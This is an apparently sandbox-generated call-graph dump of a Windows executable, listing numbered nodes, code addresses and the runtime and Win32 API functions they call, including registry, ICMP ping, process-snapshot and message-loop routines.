Mailbox 59 API calls 97840->97841 97842 512a87 97841->97842 97843 511256 97842->97843 97847 511284 97843->97847 97846->97832 97848 511291 97847->97848 97849 511275 97847->97849 97848->97849 97850 511298 RegOpenKeyExW 97848->97850 97849->97832 97850->97849 97851 5112b2 RegQueryValueExW 97850->97851 97852 5112d3 97851->97852 97853 5112e8 RegCloseKey 97851->97853 97852->97853 97853->97849 97855 532e80 __alloc_osfhnd 97854->97855 97862 533447 97855->97862 97861 532ea7 __alloc_osfhnd 97861->97837 97879 539e3b 97862->97879 97864 532e89 97865 532eb8 DecodePointer DecodePointer 97864->97865 97866 532e95 97865->97866 97867 532ee5 97865->97867 97876 532eb2 97866->97876 97867->97866 97925 5389d4 59 API calls __woutput_l 97867->97925 97869 532f48 EncodePointer EncodePointer 97869->97866 97870 532f1c 97870->97866 97874 532f36 EncodePointer 97870->97874 97927 538a94 61 API calls __realloc_crt 97870->97927 97871 532ef7 97871->97869 97871->97870 97926 538a94 61 API calls __realloc_crt 97871->97926 97874->97869 97875 532f30 97875->97866 97875->97874 97928 533450 97876->97928 97880 539e5f EnterCriticalSection 97879->97880 97881 539e4c 97879->97881 97880->97864 97886 539ec3 97881->97886 97883 539e52 97883->97880 97910 5332e5 58 API calls 3 library calls 97883->97910 97887 539ecf __alloc_osfhnd 97886->97887 97888 539ef0 97887->97888 97889 539ed8 97887->97889 97898 539f11 __alloc_osfhnd 97888->97898 97914 538a4d 58 API calls 2 library calls 97888->97914 97911 53a39b 58 API calls __NMSG_WRITE 97889->97911 97892 539edd 97912 53a3f8 58 API calls 5 library calls 97892->97912 97893 539f05 97896 539f1b 97893->97896 97897 539f0c 97893->97897 97895 539ee4 97913 5332cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97895->97913 97901 539e3b __lock 58 API calls 97896->97901 97915 538d58 58 API calls __getptd_noexit 97897->97915 97898->97883 97903 539f22 97901->97903 97904 539f47 97903->97904 97905 539f2f 97903->97905 97917 532f85 97904->97917 97916 53a05b InitializeCriticalSectionAndSpinCount 97905->97916 97908 539f3b 97923 539f63 LeaveCriticalSection _doexit 97908->97923 97911->97892 97912->97895 97914->97893 97915->97898 97916->97908 97918 532f8e RtlFreeHeap 97917->97918 97922 532fb7 _free 97917->97922 97919 532fa3 97918->97919 97918->97922 97924 538d58 58 API calls __getptd_noexit 97919->97924 97921 532fa9 GetLastError 97921->97922 97922->97908 97923->97898 97924->97921 97925->97871 97926->97870 97927->97875 97931 539fa5 LeaveCriticalSection 97928->97931 97930 532eb7 97930->97861 97931->97930 97932 515ff5 97955 515ede Mailbox _memmove 97932->97955 97933 530fe6 59 API calls Mailbox 97933->97955 97934 516a9b 98207 51a9de 274 API calls 97934->98207 97937 54eff9 98223 515190 59 API calls Mailbox 97937->98223 97939 54f007 98224 57a48d 89 API calls 4 library calls 97939->98224 97943 54efeb 97970 515569 Mailbox 97943->97970 98222 566cf1 59 API calls Mailbox 97943->98222 97944 5160e5 97945 54e137 97944->97945 97949 5163bd Mailbox 97944->97949 97958 516abc 97944->97958 97975 516152 Mailbox 97944->97975 97945->97949 98208 567aad 59 API calls 97945->98208 97947 521c9c 59 API calls 97947->97955 97952 530fe6 Mailbox 59 API calls 97949->97952 97961 516426 97949->97961 97954 5163d1 97952->97954 97956 5163de 97954->97956 97954->97958 97955->97933 97955->97934 97955->97937 97955->97939 97955->97944 97955->97947 97955->97958 97955->97970 98076 5153b0 97955->98076 98162 58c355 97955->98162 98203 51523c 97955->98203 98211 577f11 59 API calls Mailbox 97955->98211 98212 521a36 97955->98212 98216 566cf1 59 API calls Mailbox 97955->98216 97959 516413 97956->97959 97960 54e172 97956->97960 98221 57a48d 89 API calls 4 library calls 97958->98221 97959->97961 97986 515447 Mailbox 97959->97986 98209 58c87c 85 API calls 2 library calls 97960->98209 98210 58c9c9 95 API calls Mailbox 97961->98210 97965 54e19d 97965->97965 97966 530fe6 59 API calls Mailbox 97966->97986 97968 54f165 98226 57a48d 89 API calls 4 library calls 97968->98226 97969 54e691 98218 57a48d 89 API calls 4 library calls 97969->98218 97973 5169fa 97978 521c9c 59 API calls 97973->97978 97975->97943 97975->97958 97975->97970 97979 54e2e9 VariantClear 97975->97979 98104 58e60c 97975->98104 98107 585e1d 97975->98107 98132 583105 97975->98132 98137 58ebba 97975->98137 98143 51cfd7 97975->98143 98202 515190 59 API calls Mailbox 97975->98202 98217 567aad 59 API calls 97975->98217 97976 54e6a0 97977 5169ff 97977->97968 97977->97969 97978->97970 97979->97975 97980 54ea9a 97985 521c9c 59 API calls 97980->97985 97982 521c9c 59 API calls 97982->97986 97983 521207 59 API calls 97983->97986 97985->97970 97986->97966 97986->97969 97986->97970 97986->97973 97986->97977 97986->97980 97986->97982 97986->97983 97987 54eb67 97986->97987 97988 567aad 59 API calls 97986->97988 97989 532f70 67 API calls __cinit 97986->97989 97991 54ef28 97986->97991 97993 515a1a 97986->97993 97999 517e50 97986->97999 98059 516e30 97986->98059 97987->97970 98219 567aad 59 API calls 97987->98219 97988->97986 97989->97986 98220 57a48d 89 API calls 4 library calls 97991->98220 98225 57a48d 89 API calls 4 library calls 97993->98225 98000 517e53 97999->98000 98007 517e79 98000->98007 98013 517ef2 98000->98013 98001 5509e9 98003 550ad3 98001->98003 98026 518022 Mailbox 98001->98026 98028 517eb8 Mailbox 98001->98028 98241 58ccac 274 API calls 98001->98241 98002 550adf 98243 58cdc8 274 API calls 2 library calls 98002->98243 98242 57a48d 89 API calls 4 library calls 98003->98242 98005 5153b0 274 API calls 98005->98013 98007->98002 98012 517e90 98007->98012 98014 550b09 98007->98014 98009 5509e1 98240 515190 59 API calls Mailbox 98009->98240 98011 51806a 98011->97986 98017 550c37 98012->98017 98022 517ea1 98012->98022 98012->98028 98013->98001 98013->98005 98013->98009 98013->98011 98030 518015 98013->98030 98040 517fb2 98013->98040 98016 550b3d 98014->98016 98018 550b21 98014->98018 98015 550a33 98019 521c9c 59 API calls 98015->98019 98016->98002 98245 58a8fd 98016->98245 98021 521c9c 59 API calls 98017->98021 98244 57a48d 89 API calls 4 library calls 98018->98244 98019->98028 98021->98028 98022->98028 98316 567aad 59 API calls 98022->98316 98024 550d0b 98031 550d41 98024->98031 98336 58c9c9 95 API calls Mailbox 98024->98336 98026->98015 98026->98028 98238 567aad 59 API calls 98026->98238 98028->98024 98037 517ee7 98028->98037 98317 58c87c 85 API calls 2 library calls 98028->98317 98030->98026 98239 57a48d 89 API calls 4 library calls 98030->98239 98034 51523c 59 API calls 98031->98034 98032 550bb7 98272 577ed5 59 API calls 98032->98272 98033 550b6b 98252 57789a 98033->98252 98034->98037 98035 550ce9 98318 514d37 98035->98318 98037->97986 98040->98030 98227 514230 98040->98227 98041 550d1f 98044 514d37 84 API calls 98041->98044 98054 550d27 __wsetenvp 98044->98054 98045 550bc9 98273 5235b9 59 API calls Mailbox 98045->98273 98046 550cf1 __wsetenvp 98046->98024 98053 51523c 59 API calls 98046->98053 98051 550bd2 Mailbox 98056 57789a 59 API calls 98051->98056 98053->98024 98054->98031 98055 51523c 59 API calls 98054->98055 98055->98031 98057 550beb 98056->98057 98274 51b020 98057->98274 98060 516e4a 98059->98060 98062 516ff7 98059->98062 98061 5174d0 98060->98061 98060->98062 98064 516f2c 98060->98064 98069 516fdb 98060->98069 98061->98069 99070 5149e0 59 API calls wcstoxq 98061->99070 98062->98061 98062->98069 98071 517076 98062->98071 98074 516fbb Mailbox 98062->98074 98067 516f68 98064->98067 98064->98069 98064->98071 98066 54fc1e 98070 54fc30 98066->98070 99068 533f69 59 API calls __wtof_l 98066->99068 98067->98069 98067->98074 98075 54fa71 98067->98075 98069->97986 98070->97986 98071->98066 98071->98069 98071->98074 99067 567aad 59 API calls 98071->99067 98074->98066 98074->98069 99069 5141c4 59 API calls Mailbox 98074->99069 98075->98069 99066 533f69 59 API calls __wtof_l 98075->99066 98077 5153cf 98076->98077 98100 5153fd Mailbox 98076->98100 98078 530fe6 Mailbox 59 API calls 98077->98078 98078->98100 98079 5169fa 98080 521c9c 59 API calls 98079->98080 98099 515569 Mailbox 98080->98099 98081 567aad 59 API calls 98081->98100 98082 5169ff 98083 54f165 98082->98083 98084 54e691 98082->98084 99075 57a48d 89 API calls 4 library calls 98083->99075 99071 57a48d 89 API calls 4 library calls 98084->99071 98085 521207 59 API calls 98085->98100 98086 530fe6 59 API calls Mailbox 98086->98100 98087 516e30 60 API calls 98087->98100 98090 54e6a0 98090->97955 98091 54ea9a 98095 521c9c 59 API calls 98091->98095 98093 521c9c 59 API calls 98093->98100 98094 517e50 274 API calls 98094->98100 98095->98099 98096 54eb67 98096->98099 99072 567aad 59 API calls 98096->99072 98097 532f70 67 API calls __cinit 98097->98100 98099->97955 98100->98079 98100->98081 98100->98082 98100->98084 98100->98085 98100->98086 98100->98087 98100->98091 98100->98093 98100->98094 98100->98096 98100->98097 98100->98099 98101 54ef28 98100->98101 98103 515a1a 98100->98103 99073 57a48d 89 API calls 4 library calls 98101->99073 99074 57a48d 89 API calls 4 library calls 98103->99074 98105 58d1c6 130 API calls 98104->98105 98106 58e61c 98105->98106 98106->97975 98108 585e46 98107->98108 98109 585e74 WSAStartup 98108->98109 99089 51502b 59 API calls 98108->99089 98111 585e88 Mailbox 98109->98111 98112 585e9d 98109->98112 98111->97975 99076 5240cd 98112->99076 98113 585e61 98113->98109 99090 51502b 59 API calls 98113->99090 98117 514d37 84 API calls 98119 585eb2 98117->98119 98118 585e70 98118->98109 99081 52402a WideCharToMultiByte 98119->99081 98121 585ebf inet_addr gethostbyname 98121->98111 98122 585edd IcmpCreateFile 98121->98122 98122->98111 98123 585f01 98122->98123 98124 530fe6 Mailbox 59 API calls 98123->98124 98125 585f1a 98124->98125 98126 52433f 59 API calls 98125->98126 98127 585f25 98126->98127 98128 585f34 IcmpSendEcho 98127->98128 98129 585f55 IcmpSendEcho 98127->98129 98131 585f6d 98128->98131 98129->98131 98130 585fd4 IcmpCloseHandle WSACleanup 98130->98111 98131->98130 98133 51523c 59 API calls 98132->98133 98134 583118 98133->98134 99093 577d6e 98134->99093 98136 583120 98136->97975 98138 58ebcd 98137->98138 98139 514d37 84 API calls 98138->98139 98142 58ebdc 98138->98142 98140 58ec0a 98139->98140 99115 577ce4 98140->99115 98142->97975 98144 514d37 84 API calls 98143->98144 98145 51d001 98144->98145 99156 515278 98145->99156 98147 51d018 98148 51d57b 98147->98148 98155 51d439 Mailbox __wsetenvp 98147->98155 99186 51502b 59 API calls 98147->99186 98148->97975 98151 52162d 59 API calls 98151->98155 98152 514f98 59 API calls 98152->98155 98153 530c65 62 API calls 98153->98155 98155->98148 98155->98151 98155->98152 98155->98153 98157 51502b 59 API calls 98155->98157 98158 514d37 84 API calls 98155->98158 98159 521821 59 API calls 98155->98159 99161 53312d 98155->99161 99171 5259d3 98155->99171 99182 525ac3 98155->99182 99187 52153b 59 API calls 2 library calls 98155->99187 99188 514f3c 59 API calls Mailbox 98155->99188 98157->98155 98158->98155 98159->98155 98163 58c39a 98162->98163 98164 58c380 98162->98164 98166 58a8fd 59 API calls 98163->98166 99229 57a48d 89 API calls 4 library calls 98164->99229 98167 58c3a5 98166->98167 98168 5153b0 273 API calls 98167->98168 98169 58c406 98168->98169 98170 58c498 98169->98170 98174 58c447 98169->98174 98176 58c392 Mailbox 98169->98176 98171 58c4ee 98170->98171 98172 58c49e 98170->98172 98173 514d37 84 API calls 98171->98173 98171->98176 99230 577ed5 59 API calls 98172->99230 98175 58c500 98173->98175 98178 57789a 59 API calls 98174->98178 98179 521aa4 59 API calls 98175->98179 98176->97955 98181 58c477 98178->98181 98182 58c524 CharUpperBuffW 98179->98182 98180 58c4c1 99231 5235b9 59 API calls Mailbox 98180->99231 98184 566ebc 273 API calls 98181->98184 98186 58c53e 98182->98186 98184->98176 98185 58c4c9 Mailbox 98189 51b020 273 API calls 98185->98189 98187 58c591 98186->98187 98188 58c545 98186->98188 98190 514d37 84 API calls 98187->98190 98193 57789a 59 API calls 98188->98193 98189->98176 98191 58c599 98190->98191 99232 515376 60 API calls 98191->99232 98194 58c573 98193->98194 98195 566ebc 273 API calls 98194->98195 98195->98176 98196 58c5a3 98196->98176 98197 514d37 84 API calls 98196->98197 98198 58c5be 98197->98198 99233 5235b9 59 API calls Mailbox 98198->99233 98200 58c5ce 98201 51b020 273 API calls 98200->98201 98201->98176 98202->97975 98204 51524a 98203->98204 98205 515250 98203->98205 98204->98205 98206 521c9c 59 API calls 98204->98206 98205->97955 98206->98205 98207->97958 98208->97949 98209->97961 98210->97965 98211->97955 98213 521a45 __wsetenvp _memmove 98212->98213 98214 530fe6 Mailbox 59 API calls 98213->98214 98215 521a83 98214->98215 98215->97955 98216->97955 98217->97975 98218->97976 98219->97970 98220->97993 98221->97943 98222->97970 98223->97943 98224->97943 98225->97970 98226->97970 98228 514242 98227->98228 98229 51424b 98228->98229 98337 5140cb 59 API calls Mailbox 98228->98337 98231 514308 98229->98231 98232 530fe6 Mailbox 59 API calls 98229->98232 98231->98030 98233 51435c 98232->98233 98234 530fe6 Mailbox 59 API calls 98233->98234 98236 51437f 98233->98236 98235 51436c 98234->98235 98235->98236 98237 521a36 59 API calls 98235->98237 98236->98030 98237->98236 98238->98026 98239->98009 98240->98001 98241->98001 98242->98002 98243->98028 98244->98037 98246 58a918 98245->98246 98251 550b53 98245->98251 98247 530fe6 Mailbox 59 API calls 98246->98247 98249 58a93a 98247->98249 98248 530fe6 Mailbox 59 API calls 98248->98249 98249->98248 98249->98251 98338 56715b 59 API calls Mailbox 98249->98338 98251->98032 98251->98033 98253 5778ac 98252->98253 98255 550b8d 98252->98255 98254 530fe6 Mailbox 59 API calls 98253->98254 98253->98255 98254->98255 98256 566ebc 98255->98256 98257 566f06 98256->98257 98261 566f1c Mailbox 98256->98261 98258 521a36 59 API calls 98257->98258 98258->98261 98259 566f47 98262 58c355 274 API calls 98259->98262 98260 566f5a 98339 51a820 98260->98339 98261->98259 98261->98260 98271 566f53 98262->98271 98265 567002 98265->98001 98266 566fdc 98266->98271 98362 57a48d 89 API calls 4 library calls 98266->98362 98267 566f91 98267->98266 98269 566fc1 98267->98269 98267->98271 98356 56706d 98269->98356 98363 566cf1 59 API calls Mailbox 98271->98363 98272->98045 98273->98051 98636 523740 98274->98636 98277 5530b6 98739 57a48d 89 API calls 4 library calls 98277->98739 98278 51b07f 98278->98277 98280 5530d4 98278->98280 98302 51bb86 98278->98302 98313 51b132 Mailbox _memmove 98278->98313 98740 57a48d 89 API calls 4 library calls 98280->98740 98282 55355e 98315 51b4dd 98282->98315 98755 57a48d 89 API calls 4 library calls 98282->98755 98283 55318a 98283->98315 98742 57a48d 89 API calls 4 library calls 98283->98742 98288 553106 98288->98283 98741 51a9de 274 API calls 98288->98741 98291 513b31 59 API calls 98291->98313 98292 56730a 59 API calls 98292->98313 98294 530fe6 59 API calls Mailbox 98294->98313 98296 5153b0 274 API calls 98296->98313 98297 553418 98298 5153b0 274 API calls 98297->98298 98300 553448 98298->98300 98300->98315 98749 5139be 98300->98749 98738 57a48d 89 API calls 4 library calls 98302->98738 98304 5531c3 98743 57a48d 89 API calls 4 library calls 98304->98743 98305 513c30 68 API calls 98305->98313 98308 55346f 98753 57a48d 89 API calls 4 library calls 98308->98753 98310 51523c 59 API calls 98310->98313 98312 521c9c 59 API calls 98312->98313 98313->98282 98313->98288 98313->98291 98313->98292 98313->98294 98313->98296 98313->98297 98313->98302 98313->98304 98313->98305 98313->98308 98313->98310 98313->98312 98313->98315 98641 513add 98313->98641 98648 51bc70 98313->98648 98726 513a40 98313->98726 98737 515190 59 API calls Mailbox 98313->98737 98744 566c62 59 API calls 2 library calls 98313->98744 98745 58a9c3 85 API calls Mailbox 98313->98745 98746 566c1e 59 API calls Mailbox 98313->98746 98747 575ef2 68 API calls 98313->98747 98748 513ea3 68 API calls Mailbox 98313->98748 98754 57a12a 59 API calls 98313->98754 98315->98001 98316->98028 98317->98035 98319 514d51 98318->98319 98327 514d4b 98318->98327 98320 54db28 __i64tow 98319->98320 98321 514d99 98319->98321 98322 54da2f 98319->98322 98323 514d57 __itow 98319->98323 99064 5338c8 83 API calls 2 library calls 98321->99064 98329 530fe6 Mailbox 59 API calls 98322->98329 98334 54daa7 Mailbox _wcscpy 98322->98334 98326 530fe6 Mailbox 59 API calls 98323->98326 98328 514d71 98326->98328 98327->98046 98328->98327 98330 521a36 59 API calls 98328->98330 98331 54da74 98329->98331 98330->98327 98332 530fe6 Mailbox 59 API calls 98331->98332 98333 54da9a 98332->98333 98333->98334 98335 521a36 59 API calls 98333->98335 99065 5338c8 83 API calls 2 library calls 98334->99065 98335->98334 98336->98041 98337->98229 98338->98249 98340 552d51 98339->98340 98343 51a84c 98339->98343 98365 57a48d 89 API calls 4 library calls 98340->98365 98342 552d62 98342->98267 98344 552d6a 98343->98344 98349 51a888 _memmove 98343->98349 98366 57a48d 89 API calls 4 library calls 98344->98366 98347 530fe6 59 API calls Mailbox 98347->98349 98348 51a975 98348->98267 98349->98347 98349->98348 98350 552dae 98349->98350 98351 5153b0 274 API calls 98349->98351 98353 552dc8 98349->98353 98355 51a962 98349->98355 98367 51a9de 274 API calls 98350->98367 98351->98349 98353->98348 98368 57a48d 89 API calls 4 library calls 98353->98368 98355->98348 98364 58a9c3 85 API calls Mailbox 98355->98364 98357 567085 98356->98357 98369 51ec83 98357->98369 98444 58495b 98357->98444 98453 58f1b2 98357->98453 98358 5670d9 98358->98271 98362->98271 98363->98265 98364->98348 98365->98342 98366->98348 98367->98353 98368->98348 98370 514d37 84 API calls 98369->98370 98371 51eca2 98370->98371 98372 514d37 84 API calls 98371->98372 98373 51ecb7 98372->98373 98374 514d37 84 API calls 98373->98374 98375 51ecca 98374->98375 98376 514d37 84 API calls 98375->98376 98377 51ece0 98376->98377 98458 52162d 98377->98458 98380 51ed19 98381 555b67 98380->98381 98404 51ed43 __wopenfile 98380->98404 98383 5147be 59 API calls 98381->98383 98384 555b7a 98383->98384 98386 514540 59 API calls 98384->98386 98385 5147be 59 API calls 98387 555d4a 98385->98387 98388 555b8c 98386->98388 98390 555d97 98387->98390 98391 555d53 98387->98391 98395 5143d0 59 API calls 98388->98395 98420 555bb1 98388->98420 98389 514d37 84 API calls 98392 51edca 98389->98392 98396 514540 59 API calls 98390->98396 98394 514540 59 API calls 98391->98394 98397 514d37 84 API calls 98392->98397 98393 51ef0c Mailbox 98393->98358 98402 555d5e 98394->98402 98395->98420 98398 555da1 98396->98398 98399 51eddf 98397->98399 98403 5143d0 59 API calls 98398->98403 98440 51ef3e 98399->98440 98476 5147be 98399->98476 98401 555c0f 98411 514540 59 API calls 98401->98411 98401->98440 98405 514d37 84 API calls 98402->98405 98406 555dbd 98403->98406 98404->98389 98404->98401 98433 51ee30 __wopenfile 98404->98433 98404->98440 98409 555d70 98405->98409 98417 514d37 84 API calls 98406->98417 98408 51477a 59 API calls 98408->98420 98494 521364 59 API calls 2 library calls 98409->98494 98415 555c76 98411->98415 98413 51ee09 98482 514540 98413->98482 98414 5143d0 59 API calls 98414->98420 98421 5143d0 59 API calls 98415->98421 98416 555d84 98422 51477a 59 API calls 98416->98422 98423 555dd8 98417->98423 98420->98393 98420->98408 98420->98414 98492 521364 59 API calls 2 library calls 98420->98492 98421->98433 98425 555d92 98422->98425 98495 521364 59 API calls 2 library calls 98423->98495 98430 5143d0 59 API calls 98425->98430 98428 51477a 59 API calls 98428->98433 98429 555dec 98431 51477a 59 API calls 98429->98431 98430->98393 98431->98425 98432 5143d0 59 API calls 98432->98433 98433->98393 98433->98428 98433->98432 98434 555cc2 98433->98434 98491 521364 59 API calls 2 library calls 98433->98491 98435 555cfb 98434->98435 98436 555cec 98434->98436 98463 51477a 98435->98463 98493 52153b 59 API calls 2 library calls 98436->98493 98440->98385 98442 555d1c 98443 5219e1 59 API calls 98442->98443 98443->98440 98445 530fe6 Mailbox 59 API calls 98444->98445 98446 58496c 98445->98446 98507 52433f 98446->98507 98449 514d37 84 API calls 98450 58498d GetEnvironmentVariableW 98449->98450 98510 577a51 59 API calls Mailbox 98450->98510 98452 5849aa 98452->98358 98454 514d37 84 API calls 98453->98454 98455 58f1cf 98454->98455 98511 574148 CreateToolhelp32Snapshot Process32FirstW 98455->98511 98457 58f1de 98457->98358 98459 530fe6 Mailbox 59 API calls 98458->98459 98460 521652 98459->98460 98461 530fe6 Mailbox 59 API calls 98460->98461 98462 51ecf4 98461->98462 98462->98380 98475 51502b 59 API calls 98462->98475 98464 530fe6 Mailbox 59 API calls 98463->98464 98465 514787 98464->98465 98466 5143d0 98465->98466 98467 54d6c9 98466->98467 98469 5143e7 98466->98469 98467->98469 98496 5140cb 59 API calls Mailbox 98467->98496 98470 514530 98469->98470 98471 5144e8 98469->98471 98474 5144ef 98469->98474 98473 51523c 59 API calls 98470->98473 98472 530fe6 Mailbox 59 API calls 98471->98472 98472->98474 98473->98474 98474->98442 98475->98380 98477 5147c6 98476->98477 98478 530fe6 Mailbox 59 API calls 98477->98478 98479 5147d4 98478->98479 98480 5147e0 98479->98480 98497 5146ec 59 API calls Mailbox 98479->98497 98480->98401 98480->98413 98498 514650 98482->98498 98484 530fe6 Mailbox 59 API calls 98485 5145eb 98484->98485 98487 5219e1 98485->98487 98486 51454f 98486->98484 98486->98485 98488 5219fb 98487->98488 98490 5219ee 98487->98490 98489 530fe6 Mailbox 59 API calls 98488->98489 98489->98490 98490->98433 98491->98433 98492->98420 98493->98440 98494->98416 98495->98429 98496->98469 98497->98480 98499 514659 Mailbox 98498->98499 98500 54d6ec 98499->98500 98505 514663 98499->98505 98501 530fe6 Mailbox 59 API calls 98500->98501 98503 54d6f8 98501->98503 98502 51466a 98502->98486 98505->98502 98506 515190 59 API calls Mailbox 98505->98506 98506->98505 98508 530fe6 Mailbox 59 API calls 98507->98508 98509 524351 98508->98509 98509->98449 98510->98452 98521 574ce2 98511->98521 98513 574195 Process32NextW 98514 574244 CloseHandle 98513->98514 98515 57418e Mailbox 98513->98515 98514->98457 98515->98513 98515->98514 98516 521207 59 API calls 98515->98516 98517 521a36 59 API calls 98515->98517 98527 530119 98515->98527 98578 5217e0 98515->98578 98587 52151f 61 API calls 98515->98587 98516->98515 98517->98515 98522 574d09 98521->98522 98526 574cf0 98521->98526 98589 5337c3 59 API calls __wcstoi64 98522->98589 98524 574d0f 98524->98515 98526->98522 98526->98524 98588 53385c GetStringTypeW _iswctype 98526->98588 98528 521207 59 API calls 98527->98528 98529 53012f 98528->98529 98530 521207 59 API calls 98529->98530 98531 530137 98530->98531 98532 521207 59 API calls 98531->98532 98533 53013f 98532->98533 98534 521207 59 API calls 98533->98534 98535 530147 98534->98535 98536 53017b 98535->98536 98537 56627d 98535->98537 98538 521462 59 API calls 98536->98538 98539 521c9c 59 API calls 98537->98539 98540 530189 98538->98540 98541 566286 98539->98541 98603 521981 98540->98603 98543 5219e1 59 API calls 98541->98543 98546 5301be 98543->98546 98544 530193 98545 521462 59 API calls 98544->98545 98544->98546 98549 5301b4 98545->98549 98547 5301fe 98546->98547 98550 5301dd 98546->98550 98560 5662a6 98546->98560 98590 521462 98547->98590 98553 521981 59 API calls 98549->98553 98607 521609 98550->98607 98552 53020f 98556 530221 98552->98556 98558 521c9c 59 API calls 98552->98558 98553->98546 98554 566376 98557 521821 59 API calls 98554->98557 98559 530231 98556->98559 98562 521c9c 59 API calls 98556->98562 98573 566333 98557->98573 98558->98556 98564 530238 98559->98564 98565 521c9c 59 API calls 98559->98565 98560->98554 98563 56635f 98560->98563 98567 5662dd 98560->98567 98561 521462 59 API calls 98561->98547 98562->98559 98563->98554 98569 56634a 98563->98569 98566 521c9c 59 API calls 98564->98566 98575 53023f Mailbox 98564->98575 98565->98564 98566->98575 98568 56633b 98567->98568 98576 566326 98567->98576 98570 521821 59 API calls 98568->98570 98571 521821 59 API calls 98569->98571 98570->98573 98571->98573 98572 521609 59 API calls 98572->98573 98573->98547 98573->98572 98619 52153b 59 API calls 2 library calls 98573->98619 98575->98515 98610 521821 98576->98610 98579 5217f2 98578->98579 98580 55f401 98578->98580 98629 521680 98579->98629 98635 5687f9 59 API calls _memmove 98580->98635 98583 5217fe 98583->98515 98584 55f40b 98585 521c9c 59 API calls 98584->98585 98586 55f413 Mailbox 98585->98586 98587->98515 98588->98526 98589->98524 98591 521471 98590->98591 98592 5214ce 98590->98592 98591->98592 98594 52147c 98591->98594 98593 521981 59 API calls 98592->98593 98595 52149f _memmove 98593->98595 98596 521497 98594->98596 98597 55f1de 98594->98597 98595->98552 98620 521b7c 59 API calls Mailbox 98596->98620 98621 521c7e 98597->98621 98600 55f1e8 98601 530fe6 Mailbox 59 API calls 98600->98601 98602 55f208 98601->98602 98604 52198f 98603->98604 98606 521998 _memmove 98603->98606 98604->98606 98624 521aa4 98604->98624 98606->98544 98608 521aa4 59 API calls 98607->98608 98609 521614 98608->98609 98609->98547 98609->98561 98611 52189a 98610->98611 98612 52182d __wsetenvp 98610->98612 98613 521981 59 API calls 98611->98613 98614 521843 98612->98614 98615 521868 98612->98615 98618 52184b _memmove 98613->98618 98628 521b7c 59 API calls Mailbox 98614->98628 98617 521c7e 59 API calls 98615->98617 98617->98618 98618->98573 98619->98573 98620->98595 98622 530fe6 Mailbox 59 API calls 98621->98622 98623 521c88 98622->98623 98623->98600 98625 521ab7 98624->98625 98627 521ab4 _memmove 98624->98627 98626 530fe6 Mailbox 59 API calls 98625->98626 98626->98627 98627->98606 98628->98618 98630 521692 98629->98630 98633 5216ba _memmove 98629->98633 98631 530fe6 Mailbox 59 API calls 98630->98631 98630->98633 98632 52176f _memmove 98631->98632 98634 530fe6 Mailbox 59 API calls 98632->98634 98633->98583 98634->98632 98635->98584 98637 52374f 98636->98637 98640 52376a 98636->98640 98638 521aa4 59 API calls 98637->98638 98639 523757 CharUpperBuffW 98638->98639 98639->98640 98640->98278 98642 54d3cd 98641->98642 98643 513aee 98641->98643 98644 530fe6 Mailbox 59 API calls 98643->98644 98646 513af5 98644->98646 98645 513b16 98645->98313 98646->98645 98756 513ba5 59 API calls Mailbox 98646->98756 98649 55359f 98648->98649 98660 51bc95 98648->98660 98817 57a48d 89 API calls 4 library calls 98649->98817 98651 51bf3b 98651->98313 98655 51c2b6 98655->98651 98656 51c2c3 98655->98656 98815 51c483 274 API calls Mailbox 98656->98815 98659 51c2ca LockWindowUpdate DestroyWindow GetMessageW 98659->98651 98661 51c2fc 98659->98661 98720 51bca5 Mailbox 98660->98720 98818 515376 60 API calls 98660->98818 98819 56700c 274 API calls 98660->98819 98662 554509 TranslateMessage DispatchMessageW GetMessageW 98661->98662 98662->98662 98664 554539 98662->98664 98663 5536b3 Sleep 98663->98720 98664->98651 98665 51bf54 timeGetTime 98665->98720 98666 55405d WaitForSingleObject 98668 55407d GetExitCodeProcess CloseHandle 98666->98668 98666->98720 98677 51c36b 98668->98677 98669 521c9c 59 API calls 98669->98720 98670 521207 59 API calls 98702 51c1fa Mailbox 98670->98702 98671 51c210 Sleep 98671->98702 98672 530fe6 59 API calls Mailbox 98672->98720 98673 5543a9 Sleep 98673->98702 98675 530859 timeGetTime 98675->98702 98677->98313 98678 51c324 timeGetTime 98816 515376 60 API calls 98678->98816 98679 574148 66 API calls 98679->98702 98681 554440 GetExitCodeProcess 98686 554456 WaitForSingleObject 98681->98686 98687 55446c CloseHandle 98681->98687 98682 514d37 84 API calls 98682->98720 98683 596562 110 API calls 98683->98702 98685 516d79 109 API calls 98685->98720 98686->98687 98686->98720 98687->98702 98689 515376 60 API calls 98689->98720 98690 5538aa Sleep 98690->98720 98691 5544c8 Sleep 98691->98720 98692 521a36 59 API calls 98692->98702 98698 5153b0 252 API calls 98698->98720 98699 51c26d 98705 521a36 59 API calls 98699->98705 98700 51b020 252 API calls 98700->98720 98702->98670 98702->98671 98702->98675 98702->98677 98702->98679 98702->98681 98702->98683 98702->98690 98702->98691 98702->98692 98702->98720 98825 572baf 60 API calls 98702->98825 98826 515376 60 API calls 98702->98826 98827 513ea3 68 API calls Mailbox 98702->98827 98828 516cd8 274 API calls 98702->98828 98829 5670e2 59 API calls 98702->98829 98830 5757ff QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98702->98830 98703 521a36 59 API calls 98703->98720 98707 51bf25 Mailbox 98705->98707 98706 58c355 252 API calls 98706->98720 98707->98651 98814 51c460 10 API calls Mailbox 98707->98814 98709 5139be 68 API calls 98709->98720 98710 57a48d 89 API calls 98710->98720 98711 51a820 252 API calls 98711->98720 98712 566cf1 59 API calls Mailbox 98712->98720 98713 513a40 59 API calls 98713->98720 98714 553e13 VariantClear 98714->98720 98715 553ea9 VariantClear 98715->98720 98716 553c57 VariantClear 98716->98720 98717 5141c4 59 API calls Mailbox 98717->98720 98718 567aad 59 API calls 98718->98720 98719 513ea3 68 API calls 98719->98720 98720->98663 98720->98665 98720->98666 98720->98669 98720->98671 98720->98672 98720->98673 98720->98677 98720->98678 98720->98682 98720->98685 98720->98689 98720->98698 98720->98699 98720->98700 98720->98702 98720->98703 98720->98706 98720->98707 98720->98709 98720->98710 98720->98711 98720->98712 98720->98713 98720->98714 98720->98715 98720->98716 98720->98717 98720->98718 98720->98719 98721 516cd8 252 API calls 98720->98721 98722 515190 59 API calls Mailbox 98720->98722 98723 58e60c 130 API calls 98720->98723 98757 5152b0 98720->98757 98766 519a00 98720->98766 98773 519c80 98720->98773 98804 58e620 98720->98804 98807 57c270 98720->98807 98820 596655 59 API calls 98720->98820 98821 57a058 59 API calls Mailbox 98720->98821 98822 56e0aa 59 API calls 98720->98822 98823 566c62 59 API calls 2 library calls 98720->98823 98824 5138ff 59 API calls 98720->98824 98721->98720 98722->98720 98723->98720 98727 54d3b1 